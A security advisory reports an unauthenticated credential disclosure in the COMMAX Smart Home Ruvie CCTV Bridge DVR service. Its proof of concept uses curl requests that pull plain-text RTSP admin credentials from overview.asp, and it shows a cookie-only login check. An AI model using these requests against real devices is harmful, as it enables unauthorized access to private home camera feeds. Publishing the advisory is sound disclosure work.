COMMAX Smart Home Ruvie CCTV Bridge DVR Service RTSP Credential Disclosure

COMMAX Smart Home Ruvie CCTV Bridge suffers from a credential disclosure vulnerability.

MD5 | 0d5d3a5130f6133e1e168518382d87aa

COMMAX Smart Home Ruvie CCTV Bridge DVR Service RTSP Credentials Disclosure

Vendor: COMMAX Co., Ltd.
Prodcut web page:
Affected version: n/a

Summary: COMMAX Smart Home System is a smart IoT home solution for a large apartment
complex that provides advanced life values and safety.

Desc: The COMMAX CCTV Bridge for the DVR service allows an unauthenticated attacker
to disclose RTSP credentials in plain-text.

Tested on: GoAhead-Webs

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

Advisory ID: ZSL-2021-5665
Advisory URL:



$ curl http://TARGET:8086/overview.asp
<TITLE> Infomation</TITLE>
<script src="./jquery.min.js"></script>
<script src="./jquery.cookie.js"></script>
<script src="./login_check.js"></script>
<li> [2021/08/15 09:56:46] Started <BR> <li> MAX USER : 32 <BR> <li> DVR Lists <BR>[1] rtsp://admin:s3cr3tP@[email protected]:554/Streaming/Channels/2:554 <BR>

$ curl http://TARGET:8086/login_check.js:
var server_ip = $(location).attr('host');
var server_domain = server_ip.replace(":8086", "");

document.domain = server_domain;

var cookiesAuth = $.cookie("cookiesAuth");

if (cookiesAuth != "authok") {
parent.document.location.href = "http://" + server_domain + ":8086/home.asp";

Related Posts